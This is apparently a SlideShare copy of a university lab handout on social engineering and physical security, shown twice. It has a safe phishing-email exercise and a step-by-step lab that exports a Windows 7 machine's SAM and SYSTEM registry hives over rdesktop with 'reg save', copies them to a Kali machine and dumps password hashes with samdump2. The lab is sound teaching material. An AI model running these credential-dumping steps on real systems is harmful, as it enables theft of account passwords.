SlideShare a Scribd company logo
Lab-12: Social Engineering and Physical Security
The first section of Lab-11 will be different than what you have
been doing in the Labs till today. You will search your junk e-
mail folder to find a spam/phishing e-mail and provide insights
on the discovered e-mail. Please be careful and don’t click in
the links in the e-mail you found. The second section of the lab
is a simulation of a physical security breach. It shows how
things can be more comfortable for malicious users and
especially for an insider when physical security is not
strong.Section-1: Social Engineering Lab
Social engineering attacks are usually performed case by case,
meaning that it is not generally possible to automate and scale
the tasks. Because it requires interacting with people in person
or over the phone. The main goal is to convince people to do
something for the hacker, such as sharing a password, doing
some configuration, etc. Phishing e-mails is one of the methods
that hackers can use in social engineering campaigns. Phishing
e-mails can be regarded as a scalable and automated way of
making social engineering attacks.
Phishing e-mails are considered spam/junk e-mail by most e-
mail service providers such as Gmail and Outlook.
Advanced and targeted phishing e-mails may harm your
computer, even if you haven't clicked on any link in the e-mail,
meaning that just opening the e-mail might harm your computer.
These kinds of phishing e-mails use the browser or e-mail
client's vulnerabilities on which you open the e-mail.
Important: Before starting this lab,
make sure that
your browser and e-mail client is up-to-date. Check
your antivirus definition database to confirm that it is up-to-
date. You can also consider using Kali VM on your computer
for this lab; the only thing is that you will have to log in to your
e-mail service from the browser.
After completing all of these pre-checks:
1) Go to your spam/junk e-mail folder
2) Find a phishing/spam e-mail
Be cautious and don’t click any link as it may contain links to
malicious websites and files
3)
Take a screenshot of the phishing/spam e-mail
4) Explain why it is a spam e-mailSection-2: Physical Security
Lab
Physical security can be considered as an essential aspect of
cybersecurity. From a technical perspective, it is usually easier
to steal information from a physically not secured
device/environment than from a physically secured
device/environment. In addition to conventional physical
security countermeasures, computer hard drives should be fully
encrypted. BIOS access should be restricted by a password.
Computers should be configured not to boot from external
media such as a USB. Otherwise, attackers with physical access
can boot the system from his/her media and perform malicious
acts such as stealing information, installing rootkits, and wiping
hard drive.
Assume that you access the physical premises of a company by
exploiting the vulnerabilities in physical security procedures.
You bring your laptop with you (Kali Linux on Netlab
environment) and plug it to the company network. You assign
an IP address to your computer and finally access to the
network. The target is one of the Windows 7 computers in the
network. Your motivation is to steal the password hash of the
Administrator account on that computer. Because you know that
the company has been using the same password in different
systems. You already know the password of the ms user on
Windows 7.
Now follow the following steps to steal the password hashes.
1) Log in to Kali Linux on the Netlab Environment
Assume that this is your laptop, and you already gained access
to the company network.
2)
Open a terminal window and type
rdesktop 192.168.2.13 -r disk:tmp=/root/Desktop
This command will open a remote desktop connection to
Windows 7 Target and map the Desktop of root account on Kali
to Windows 7 Target so that as the attacker, you will be able to
copy the file with password hashes to the attacker computer
(Kali) easily.
3) Type yes for the “Do you trust this certificate?” question
4) You will see the login screen of the Windows 7 Target
5) Click Other User
6) Type username as
ms and password as
ms
7) Click the start menu, right-click on Command Prompt icon,
click on
Run as administrator, and click on Yes
8) Type
reg save HKLMSAM c:SAM and press enter
Reg is a built-in Windows command that helps system
administrators automate register administration tasks (such as
view, query, delete, import, export, change). At the hands of an
attacker, this tool can turn into a weapon like many other
system administration tools.
In this specific command, you export the portion of the registry
that stores username and password hashes of the accounts. But
it has an encryption layer, and you have to decrypt it to see the
usernames and password hashes.
9) Type
reg save HKLMSYSTEM c:SYSTEM and press enter
In this command, you export yet another critical portion of the
registry. In our context, you will get the syskey from this file
and use it to decrypt the SAM file you export in the previous
step.
10) Double click Computer icon on the desktop, open C drive
and confirm that SAM and SYSTEM files have been created.
11)
Select both files, right-click on them and click ‘Copy’
12) Revert to My Computer view as performed in Step-10. You
will see the Desktop of the root account on Kali is mapped as
tmp, as shown below.
13)
Paste the files you copied in the previous step into this
mapped drive.
14) Log out of Windows 7 Target
15) Confirm that SAM and SYSTEM files are on the desktop of
Kali
16) At the terminal windows, type
cd Desktop to change the directory to the Desktop
(Notice that D is capital)
17)
Type
samdump2 SYSTEM SAM in the terminal window to
extract the usernames and password hashes. The obvious next
step for an attacker would be to crack the Administrator
password by performing a brute force attack against hashes.
Take a screenshot of the terminal window showing the account
information.
Weekly Learning and Reflection
In two to three paragraphs (i.e., sentences, not bullet lists) using
APA style citations if needed, summarize, and interact with the
content covered in this lab. Summarize what you did as an
attacker, what kind of vulnerabilities did you exploit, what
might have prevented these attacks. Mention the attackers and
all of the targets in your summary. You can provide topologies,
sketches, graphics if you want. In particular, highlight what
surprised, enlightened, or otherwise engaged you. You should
think and write critically, not just about what was presented but
also what you have learned through the session. You can ask
questions for the things you're confused about. Questions asked
here will be summarized and answered anonymously in the next
class.
image1.png

More Related Content

PDF
CNIT 124: Ch 9: Password Attacks
DOC
eForensics Magazine - HOW TO STEAL GMAIL CREDENTIALS USING SE-TOOLKIT – A CA...
PDF
LNK Payload exploit in windows
PPTX
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
PPTX
Hacking_PPT
PPTX
Hacking and cracking
PDF
CREST CCT Lab Prep Notes
PDF
DEFCON 23 - Gerard Laygui - forensic artifacts pass the hash att
CNIT 124: Ch 9: Password Attacks
eForensics Magazine - HOW TO STEAL GMAIL CREDENTIALS USING SE-TOOLKIT – A CA...
LNK Payload exploit in windows
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
Hacking_PPT
Hacking and cracking
CREST CCT Lab Prep Notes
DEFCON 23 - Gerard Laygui - forensic artifacts pass the hash att

Similar to Lab-12 Social Engineering and Physical Security The firs.docx (20)

PPTX
Hacker tooltalk: Social Engineering Toolkit (SET)
PDF
_Hackercool - September 2021.pdf
PDF
[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들
PPT
Network security
PDF
Hacking from the Inside
PPT
Network Security Attacks, and Solutions.
PPT
Network Security. Different aspects of Network Security.
PDF
Hacking With Kali Linux A Complete Guide For Beginners To Study Basic Hacking...
PPTX
Windows post exploitation
PPTX
Parag presentation on ethical hacking
PPT
Windows network
PPT
Module 8 System Hacking
PPT
Windows network security
PPTX
Hacking
PPTX
System Security
PPTX
Passwords & security
PDF
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
PPT
Network security
PPTX
Security_Awareness_Primer.pptx
PPTX
Ethical Hacking Redefined
Hacker tooltalk: Social Engineering Toolkit (SET)
_Hackercool - September 2021.pdf
[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들
Network security
Hacking from the Inside
Network Security Attacks, and Solutions.
Network Security. Different aspects of Network Security.
Hacking With Kali Linux A Complete Guide For Beginners To Study Basic Hacking...
Windows post exploitation
Parag presentation on ethical hacking
Windows network
Module 8 System Hacking
Windows network security
Hacking
System Security
Passwords & security
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
Network security
Security_Awareness_Primer.pptx
Ethical Hacking Redefined
Ad

More from pauline234567 (20)

DOCX
Journeys of Paul REL3034.E1Assignment OneWrite about half.docx
DOCX
JW House FundraiserJourney Through the Enchanted Forest Ga.docx
DOCX
JP Morgan Chase The Balance Between Serving Customers and Maxim.docx
DOCX
Interpret a Current Policy of Three CountriesInstructionsAs .docx
DOCX
INTRODUCTIONWhen you think of surveillance, you may picture tw.docx
DOCX
Interviews and Eyewitness Identifications AP PhotoMat.docx
DOCX
Interview Presentation QuestionsTo prepare · I.docx
DOCX
INT 220 Business Brief Template Course Project.docx
DOCX
Instructor Name Point Value 30Student NameCATEGORY .docx
DOCX
InstructionsThere are two high-level types of distribution cha.docx
DOCX
InstructionsNOTE If you have already reviewed this presentation.docx
DOCX
InstructionsA SWOT analysis is used as a strategic planning tech.docx
DOCX
InstructionsRead two of your colleagues’ postings from the Di.docx
DOCX
InstructionsRespond to your colleagues. Respond with a comment .docx
DOCX
InstructionsProcurement Outsourcing (PO) StrategiesPO strat.docx
DOCX
InstructionsPart Four of Applied Final Project,Playing with Ge.docx
DOCX
InstructionsClients come to MFTs because they want to change, .docx
DOCX
INST560, Internet of Things (IoT)UNIVERSITY OF NORTH AMERICA.docx
DOCX
Insert Prename, Surname of all studentsWinter Term 202223Theo.docx
DOCX
Informative SpeechCourse COM103 Public SpeakingCriteria.docx
Journeys of Paul REL3034.E1Assignment OneWrite about half.docx
JW House FundraiserJourney Through the Enchanted Forest Ga.docx
JP Morgan Chase The Balance Between Serving Customers and Maxim.docx
Interpret a Current Policy of Three CountriesInstructionsAs .docx
INTRODUCTIONWhen you think of surveillance, you may picture tw.docx
Interviews and Eyewitness Identifications AP PhotoMat.docx
Interview Presentation QuestionsTo prepare · I.docx
INT 220 Business Brief Template Course Project.docx
Instructor Name Point Value 30Student NameCATEGORY .docx
InstructionsThere are two high-level types of distribution cha.docx
InstructionsNOTE If you have already reviewed this presentation.docx
InstructionsA SWOT analysis is used as a strategic planning tech.docx
InstructionsRead two of your colleagues’ postings from the Di.docx
InstructionsRespond to your colleagues. Respond with a comment .docx
InstructionsProcurement Outsourcing (PO) StrategiesPO strat.docx
InstructionsPart Four of Applied Final Project,Playing with Ge.docx
InstructionsClients come to MFTs because they want to change, .docx
INST560, Internet of Things (IoT)UNIVERSITY OF NORTH AMERICA.docx
Insert Prename, Surname of all studentsWinter Term 202223Theo.docx
Informative SpeechCourse COM103 Public SpeakingCriteria.docx
Ad

Recently uploaded (20)

PDF
BP 704 T. NOVEL DRUG DELIVERY SYSTEMS (UNIT 1)
PDF
CISA (Certified Information Systems Auditor) Domain-Wise Summary.pdf
PPTX
202450812 BayCHI UCSC-SV 20250812 v17.pptx
PDF
HVAC Specification 2024 according to central public works department
PPTX
A powerpoint presentation on the Revised K-10 Science Shaping Paper
PDF
Black Hat USA 2025 - Micro ICS Summit - ICS/OT Threat Landscape
PDF
1.3 FINAL REVISED K-10 PE and Health CG 2023 Grades 4-10 (1).pdf
PPTX
20th Century Theater, Methods, History.pptx
PPTX
Introduction to pro and eukaryotes and differences.pptx
PDF
advance database management system book.pdf
DOC
Soft-furnishing-By-Architect-A.F.M.Mohiuddin-Akhand.doc
PPTX
Introduction to Building Materials
PDF
FORM 1 BIOLOGY MIND MAPS and their schemes
PDF
medical_surgical_nursing_10th_edition_ignatavicius_TEST_BANK_pdf.pdf
PDF
IGGE1 Understanding the Self1234567891011
PDF
ChatGPT for Dummies - Pam Baker Ccesa007.pdf
PDF
LDMMIA Reiki Yoga Finals Review Spring Summer
PPTX
TNA_Presentation-1-Final(SAVE)) (1).pptx
PPTX
ELIAS-SEZIURE AND EPilepsy semmioan session.pptx
PPTX
CHAPTER IV. MAN AND BIOSPHERE AND ITS TOTALITY.pptx
BP 704 T. NOVEL DRUG DELIVERY SYSTEMS (UNIT 1)
CISA (Certified Information Systems Auditor) Domain-Wise Summary.pdf
202450812 BayCHI UCSC-SV 20250812 v17.pptx
HVAC Specification 2024 according to central public works department
A powerpoint presentation on the Revised K-10 Science Shaping Paper
Black Hat USA 2025 - Micro ICS Summit - ICS/OT Threat Landscape
1.3 FINAL REVISED K-10 PE and Health CG 2023 Grades 4-10 (1).pdf
20th Century Theater, Methods, History.pptx
Introduction to pro and eukaryotes and differences.pptx
advance database management system book.pdf
Soft-furnishing-By-Architect-A.F.M.Mohiuddin-Akhand.doc
Introduction to Building Materials
FORM 1 BIOLOGY MIND MAPS and their schemes
medical_surgical_nursing_10th_edition_ignatavicius_TEST_BANK_pdf.pdf
IGGE1 Understanding the Self1234567891011
ChatGPT for Dummies - Pam Baker Ccesa007.pdf
LDMMIA Reiki Yoga Finals Review Spring Summer
TNA_Presentation-1-Final(SAVE)) (1).pptx
ELIAS-SEZIURE AND EPilepsy semmioan session.pptx
CHAPTER IV. MAN AND BIOSPHERE AND ITS TOTALITY.pptx

Lab-12 Social Engineering and Physical Security The firs.docx

  • 1. Lab-12: Social Engineering and Physical Security The first section of Lab-11 will be different than what you have been doing in the Labs till today. You will search your junk e- mail folder to find a spam/phishing e-mail and provide insights on the discovered e-mail. Please be careful and don’t click in the links in the e-mail you found. The second section of the lab is a simulation of a physical security breach. It shows how things can be more comfortable for malicious users and especially for an insider when physical security is not strong.Section-1: Social Engineering Lab Social engineering attacks are usually performed case by case, meaning that it is not generally possible to automate and scale the tasks. Because it requires interacting with people in person or over the phone. The main goal is to convince people to do something for the hacker, such as sharing a password, doing some configuration, etc. Phishing e-mails is one of the methods that hackers can use in social engineering campaigns. Phishing e-mails can be regarded as a scalable and automated way of making social engineering attacks. Phishing e-mails are considered spam/junk e-mail by most e- mail service providers such as Gmail and Outlook. Advanced and targeted phishing e-mails may harm your computer, even if you haven't clicked on any link in the e-mail, meaning that just opening the e-mail might harm your computer. These kinds of phishing e-mails use the browser or e-mail client's vulnerabilities on which you open the e-mail. Important: Before starting this lab, make sure that your browser and e-mail client is up-to-date. Check your antivirus definition database to confirm that it is up-to- date. You can also consider using Kali VM on your computer for this lab; the only thing is that you will have to log in to your
  • 2. e-mail service from the browser. After completing all of these pre-checks: 1) Go to your spam/junk e-mail folder 2) Find a phishing/spam e-mail Be cautious and don’t click any link as it may contain links to malicious websites and files 3) Take a screenshot of the phishing/spam e-mail 4) Explain why it is a spam e-mailSection-2: Physical Security Lab Physical security can be considered as an essential aspect of cybersecurity. From a technical perspective, it is usually easier to steal information from a physically not secured device/environment than from a physically secured device/environment. In addition to conventional physical security countermeasures, computer hard drives should be fully encrypted. BIOS access should be restricted by a password. Computers should be configured not to boot from external media such as a USB. Otherwise, attackers with physical access can boot the system from his/her media and perform malicious acts such as stealing information, installing rootkits, and wiping hard drive. Assume that you access the physical premises of a company by exploiting the vulnerabilities in physical security procedures. You bring your laptop with you (Kali Linux on Netlab environment) and plug it to the company network. You assign an IP address to your computer and finally access to the network. The target is one of the Windows 7 computers in the network. Your motivation is to steal the password hash of the Administrator account on that computer. Because you know that the company has been using the same password in different systems. You already know the password of the ms user on Windows 7. Now follow the following steps to steal the password hashes.
  • 3. 1) Log in to Kali Linux on the Netlab Environment Assume that this is your laptop, and you already gained access to the company network. 2) Open a terminal window and type rdesktop 192.168.2.13 -r disk:tmp=/root/Desktop This command will open a remote desktop connection to Windows 7 Target and map the Desktop of root account on Kali to Windows 7 Target so that as the attacker, you will be able to copy the file with password hashes to the attacker computer (Kali) easily. 3) Type yes for the “Do you trust this certificate?” question 4) You will see the login screen of the Windows 7 Target 5) Click Other User 6) Type username as ms and password as ms 7) Click the start menu, right-click on Command Prompt icon, click on Run as administrator, and click on Yes 8) Type reg save HKLMSAM c:SAM and press enter Reg is a built-in Windows command that helps system administrators automate register administration tasks (such as view, query, delete, import, export, change). At the hands of an attacker, this tool can turn into a weapon like many other system administration tools. In this specific command, you export the portion of the registry that stores username and password hashes of the accounts. But it has an encryption layer, and you have to decrypt it to see the usernames and password hashes. 9) Type reg save HKLMSYSTEM c:SYSTEM and press enter
  • 4. In this command, you export yet another critical portion of the registry. In our context, you will get the syskey from this file and use it to decrypt the SAM file you export in the previous step. 10) Double click Computer icon on the desktop, open C drive and confirm that SAM and SYSTEM files have been created. 11) Select both files, right-click on them and click ‘Copy’ 12) Revert to My Computer view as performed in Step-10. You will see the Desktop of the root account on Kali is mapped as tmp, as shown below. 13) Paste the files you copied in the previous step into this mapped drive. 14) Log out of Windows 7 Target 15) Confirm that SAM and SYSTEM files are on the desktop of Kali 16) At the terminal windows, type cd Desktop to change the directory to the Desktop (Notice that D is capital) 17) Type samdump2 SYSTEM SAM in the terminal window to extract the usernames and password hashes. The obvious next step for an attacker would be to crack the Administrator password by performing a brute force attack against hashes. Take a screenshot of the terminal window showing the account information. Weekly Learning and Reflection In two to three paragraphs (i.e., sentences, not bullet lists) using
  • 5. APA style citations if needed, summarize, and interact with the content covered in this lab. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class. image1.png